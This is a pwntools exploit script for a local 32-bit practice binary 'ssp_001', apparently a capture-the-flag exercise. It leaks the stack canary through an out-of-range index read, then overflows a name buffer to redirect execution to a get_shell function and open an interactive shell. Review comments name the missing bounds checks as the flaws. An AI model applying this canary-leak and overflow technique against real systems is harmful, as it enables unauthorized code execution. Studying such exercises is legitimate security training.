from pwn import *
# Solver for the local ./ssp_001 practice binary (32-bit x86). It reads the
# stack canary back through the program's "P" menu, then submits a name through
# the "E" menu that carries the same canary value.
# The loop indentation was missing in the listing; the loop body is assumed to
# end at the line that collects the hex digits.
context.arch = "x86"
p = process("./ssp_001")

# get canary
# Each "P" request yields one reply line; the two characters before its
# trailing newline are taken as the hex digits of the byte at that index.
# Indexes 0x80..0x83 are read as the four canary bytes.
# NOTE(review): this only works if the target prints elements past the end of
# its buffer -- presumably the index is not bounds-checked; confirm in the
# target's source, since a range check there removes the leak.
hex_digits = []
for offset in range(4):
    p.sendlineafter("> ", "P\n")
    p.sendlineafter("Element index : ", str(0x80 + offset))
    reply = p.recvline()
    hex_digits.append(reply.decode('utf-8')[-3:-1])
canary = "0x" + "".join(hex_digits)
print(canary)

# The digits were joined in read order, so packing the integer big-endian
# keeps the bytes in the order they were read.
canary = int(canary, 16).to_bytes(4, byteorder="big")
print(f"canary : {canary}")

# NOTE(review): a hard-coded address assumes the binary is loaded at a fixed
# base (no PIE) -- TODO confirm for the build under test.
ret_addr = 0x080486b9  # get_shell

# Layout as built here: 0x40 filler bytes, the 4 canary bytes, 8 more filler
# bytes, then the 4-byte packed address.
filler = b'A' * 0x40
gap = b'B' * 0x8
payload = filler + canary + gap + p32(ret_addr)
print(b"payload : " + payload)
print(f"payload len : {len(payload)}")

# The size sent is the full payload length, which is larger than the 0x40
# filler. NOTE(review): presumably the target uses this size unchecked for
# the following read; capping it at the destination buffer size is the fix.
p.sendlineafter("> ", "E\n")
p.sendlineafter("Name Size : ", str(len(payload)))
p.sendlineafter("Name : ", payload)
p.interactive()
ssp_001
2022. 12. 22. 16:03